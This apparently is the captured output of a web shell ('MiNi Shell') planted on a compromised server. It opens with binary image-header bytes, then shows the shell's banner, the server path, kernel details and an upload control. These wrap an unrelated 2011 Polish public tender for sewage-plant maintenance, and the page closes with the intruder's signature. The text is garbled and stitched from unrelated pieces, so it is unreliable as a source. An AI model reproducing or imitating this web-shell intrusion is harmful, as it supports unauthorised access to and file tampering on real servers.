JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110418/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110418/117477-N-2011.html

<p class="kh_header"><b>Świdnica: Bieżąca obsługa i  konserwacja oczyszczalni ścieków, przepompowni ścieków i sieci kanalizacji sanitarnej  w  Piławie Dolnej, gmina Dzierżoniów oraz nadzór nad prawidłowym funkcjonowaniem  oczyszczalni ścieków w Makowicach gm. Świdnica i  oczyszczalni ścieków w Wilkowie Wielkim gm. Niemcza</b><br>
<b>Numer ogłoszenia: 117477 - 2011; data zamieszczenia: 18.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobu Własności Rolnej Skarbu Państwa w Świdnicy , ul. Kliczkowska 28, 58-100 Świdnica, woj. dolnośląskie, tel. 74 8512272, faks 74 8503213.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa Osoba Prawna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżąca obsługa i  konserwacja oczyszczalni ścieków, przepompowni ścieków i sieci kanalizacji sanitarnej  w  Piławie Dolnej, gmina Dzierżoniów oraz nadzór nad prawidłowym funkcjonowaniem  oczyszczalni ścieków w Makowicach gm. Świdnica i  oczyszczalni ścieków w Wilkowie Wielkim gm. Niemcza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest :
a) bieżąca obsługa i  konserwacja  oczyszczalni ścieków typu  BIOBLOK  MU - 50,  sekwencyjno- biologiczno-mechaniczna, typu MU , oparta o proces nisko obciążonego osadu czynnego zlokalizowanego w Piławie Dolnej  przy ul Stawowej.
b) bieżąca obsługa i konserwacja sieci  kanalizacji sanitarnej osiedlowej, długość 1 399  mb zlokalizowanej w Piławie Dolnej wzdłuż ulicy Stawowej i Błotnistej
c) bieżąca obsługa i konserwacja przepompowni ( dwa zespoły pompowe) ścieków zlokalizowana przy Zakładzie Karnym, ul Błotnista W Piławie Dolnej
d) nadzór nad prawidłowym funkcjonowaniem oraz utrzymanie porządku i koszenie traw w obrębie oczyszczalni ścieków  w Makowicach gm. Świdnica oraz  w  Wilkowie Wielkim gm. Niemcza 
Zakres robót do wykonania:
Oczyszczalnia ścieków typ BIOBLOK  MU - 50, oczyszczalnia sekwencyjna biologiczno-mechaniczna, 
typu MU , 
 - przyjęcie ścieków surowych z kanalizacji ściekowej sanitarnej w systemie całodobowym,
  - mechaniczne i biologiczne oczyszczanie ścieków na udostępnionych do eksploatacji urządzeniach oczyszczalni zgodnie z instrukcją technologiczną i eksploatacyjną stanowiącą załącznik nr 1 niniejszej specyfikacji,
 - bieżące utrzymanie zieleni niskiej w granicach ogrodzenia oczyszczalni,
 - bieżące utrzymanie w czystości obiektów BIOBLOKU  MU - 50 i przepompowni ścieków,
 - wykonanie czynności konserwacji wszystkich urządzeń, a zwłaszcza; pomp, zasuw mieszadła itp. zgodnie z instrukcją technologiczną i eksploatacyjną stanowiącą załącznik nr 1 niniejszej  specyfikacji,
 - zapewnienie niezbędnego nadzoru nad oczyszczalnią i pompownią przez osobę posiadającą odpowiednie kwalifikacje i uprawnienia,
 - wykonywanie analiz fizyko chemicznych ścieków w zakresie przewidzianym w instrukcji eksploatacji, oraz pozwoleniu wodno - prawnym z częstotliwością raz na dwa miesiące,
 - prowadzenie dokumentacji eksploatacyjnej oczyszczalni  zgodnie z art. 36 ustawy o odpadach z dnia 27 kwietnia 2001 roku (Dz. U. Nr 62 poz. 628 z p. zm.),
 - wywóz na odstojniki i unieszkodliwienie nadmiernej ilości osadu zgodnie z obowiązującymi przepisami sprawowanie nadzoru nad istniejącą siecią kanalizacyjną w tym eliminowanie przypadków niedrożności oraz    przedostawania się wód opadowych do kanalizacji,
 - przedkładanie Zamawiającemu wykazu urządzeń kwalifikujących się do remontu z określeniem zakresu robót i przewidywanych kosztów prac remontowych,
 - przygotowanie, nadzór, zabezpieczenie i wykonanie prac niebezpiecznych z użyciem własnego sprzętu,
-  współdziałanie z Zamawiającym we wszystkich sprawach związanych z eksploatacją,  zgodnie z obowiązującymi przepisami (Dz. U. Nr 21, poz. 73 z 1994r.; zwłaszcza w opracowaniu planu remontów modernizacji, sprawozdawczości okresowej do opłat za korzystanie ze środowiska i realizacji zaleceń WIOŚ, PIP, PIS,
 - usuwanie  w trybie awaryjnym na koszt Zamawiającego  drobnych usterek i awarii  , po  uprzednim uzgodnieniu
 z Zamawiającym  zakresu i kosztu ich usuwania,
 - niezwłoczne powiadamianie Zamawiającego o konieczności usunięcia awarii wymagających wykonania 
w oddzielnym trybie postępowania specjalistycznej usługi lub roboty budowlanej.
Sieć kanalizacji sanitarnej 
 - sprawowanie nadzoru nad istniejącą siecią kanalizacyjną w tym eliminowanie przypadków niedrożności oraz przedostawania się wód opadowych do kanalizacji,
 -  obserwacja i usuwanie niedrożności na instalacji kanalizacji sanitarnej,
 -  obserwacja i czyszczenie studzienek kanalizacji sanitarnej.
Przepompownia ścieków bytowych ul. Błotnista w Piławie Dolnej  k. Zakładu Karnego
 - obsługa i konserwacja zamontowanych urządzeń mechanicznych na bieżąco w systemie całodobowym,
 - obsługa i konserwacja urządzeń instalacji elektrycznej urządzeń elektroenergetycznych  i urządzeń  sterowniczych,
 - utrzymanie obiektu i urządzeń  mechanicznych i elektroenergetycznych w czystości,
 - utrzymanie obiektu i przyległego terenu w czystości,
 - usuwanie w trybie awaryjnym i na koszt Zamawiającego drobnych usterek  awarii,  po uprzednim uzgodnieniu 
z Zamawiającym  zakresu i kosztu ich usuwania,
 - niezwłoczne powiadamianie administratora o konieczności usunięcia awarii wymagających wykonania 
w oddzielnym trybie postępowania specjalistycznej usługi lub roboty budowlanej. 
Nadzór nad prawidłowym funkcjonowaniem:
  -  oczyszczalni ścieków w Makowicach gm. Świdnica 
  -  oczyszczalni ścieków w Wilkowie Wielkim gm. Niemcza 
polega na:
- na kontroli w/w oczyszczalni w okresach co 2-a  tygodnie, z której to kontroli Wykonawca sporządzi  notatkę zawierająca  aktualny stan oczyszczalni i wszelkie usterki jakie należy usunąć  na koszt Zamawiającego. Wykonawca zobowiązany jest kopię notatki przekazać koordynatorowi ze strony Zamawiającego,  w terminie 7dni od daty jej sporządzenia,
- utrzymanie porządku i koszeniu traw w  obrębie oczyszczalni..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.11.41.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 8.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie , że Wykonawca posiada uprawnienia do wykonania usług objętych zamówieniem Wykonawca zobowiązany  jest załączyć do oferty :
Oświadczenie , że Wykonawca spełnia warunki określone w art.22 ust.1 ustawy PZP wg wzoru formularza ofertowego - załącznika  Nr 4</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie , że Wykonawca posiada niezbędną wiedzę i doświadczenie - to jest wykonał w okresie ostatnich trzech lat  przed upływem terminu składania ofert , jeżeli okres prowadzonej działalności jest krótszy - w tym okresie - usługi bieżące, konserwację i nadzór nad prawidłowym funkcjonowaniem oczyszczalni ścieków, o wartości  co najmniej 30.000,00 zł brutto.
- Wykonawca zobowiązany jest załączyć do oferty :
Wykaz wykonanych usług  ( odrębnych  zadań ) z podaniem wartości , przedmiotu, daty wykonania i odbiorców usług
Dokumenty potwierdzające , że usługi bieżące, konserwacje i nadzór nad prawidłowym funkcjonowaniem oczyszczalni ścieków zostały wykonane należycie.
Oświadczenie , że Wykonawca spełnia warunki określone w art. 22 ust.1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia Wykonawca zobowiązany jest załączyć do oferty:
Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług  wraz z informacją na temat ich kwalifikacji  zawodowych niezbędnych do wykonania zamówienia, a także zakresu wykonywanych  przez nie czynności oraz informację o podstawie dysponowania tymi osobami , wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają taki obowiązek posiadania  takich uprawnień .
W przypadku , gdy Wykonawca poda informacje o osobie , którą będzie dysponował , musi dołączyć do oferty pisemne zobowiązanie ( oświadczenie ) tej osoby lub innych podmiotów  do udostępnienia osoby, która będzie uczestniczyć w wykonaniu zamówienia .
Oświadczenie , że  Wykonawca  spełnia warunki określone w art.22. ust.1 ustawy PZP wg wzoru formularza 
ofertowego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej  wykonanie zamówienia  Wykonawca zobowiązany jest załączyć do oferty:
Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 
Z przedłożonych dokumentów winno bezspornie wynikać, iż ubezpieczenie jest opłacone  poprzez jednoznaczny zapis  na polisie  lub dowód opłacenia przelewem  lub do kasy.
Oświadczenie, że Wykonawca spełnia warunki określone w art.22  ust.1 ustawy PZP wg wzoru formularza ofertowego.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie istotne zmiany i uzupełnienia umowy wymagają formy pisemnego aneksu, pod rygorem nieważności.
2. Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:
2.1 Zmiana terminu realizacji umowy:
a) zmiany spowodowane warunkami atmosferycznymi, a w szczególności śnieżyce, nadmierne opady deszczu, huragany itp.
b) zmiany będące następstwem działań i decyzji organów administracji a w szczególności: 
- wstrzymanie realizacji przedmiotu jako następstwo działania osób trzecich.
W przypadkach wymienionych 11 ust. 2.1 Zamawiający wyznaczy nowy termin realizacji umowy, odpowiedni do zaistniałych okoliczności.
2.2 Zmiana wynagrodzenia:
- zmniejszenie wynagrodzenia w przypadkach, o których mowa jest w pkt. 2.1 będzie uzależnione od terminu realizacji przedmiotu, a wartość będzie proporcjonalna do wartości umownej w §7.
2.3 Pozostałe zmiany:
- warunki atmosferyczne (śnieżyce, nadmierne opady deszczu, huragany itp.) uniemożliwiające wykonanie przedmiotu umowy zgodnie z SIWZ lub treścią umowy,
- zmiana danych związanych z obsługa administracyjno-organizacyjną umowy (np. zmiana rachunku bankowego, koordynatora umowy, zmiana adresu itp.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.anr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.anr.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.04.2011 godzina 10:00, miejsce: Administracja Zasobu Własności Rolnej Skarbu Państwa w Świdnicy, 58-100 Świdnica, ul. Kliczkowska28 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com